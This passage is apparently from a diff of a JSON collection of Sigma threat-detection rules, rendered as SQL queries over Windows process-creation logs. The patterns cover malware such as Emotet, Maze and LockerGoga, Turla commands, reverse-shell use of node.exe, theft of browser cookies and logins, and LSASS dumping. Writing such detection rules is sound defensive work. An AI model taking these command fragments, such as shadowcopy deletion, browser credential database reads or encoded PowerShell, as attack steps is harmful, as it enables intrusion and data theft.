'%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", - "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "PUA - NirCmd Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", @@ -16838,596 +16747,580 @@ "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "status": "experimental", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use for tracing purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "status": "experimental", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "title": "Add New Windows Capability - ProcCreation", + "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "status": "experimental", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" + "attack.t1059" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Legitimate use by a software developer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ - "attack.execution", + "attack.t1218", "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "status": "experimental", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND 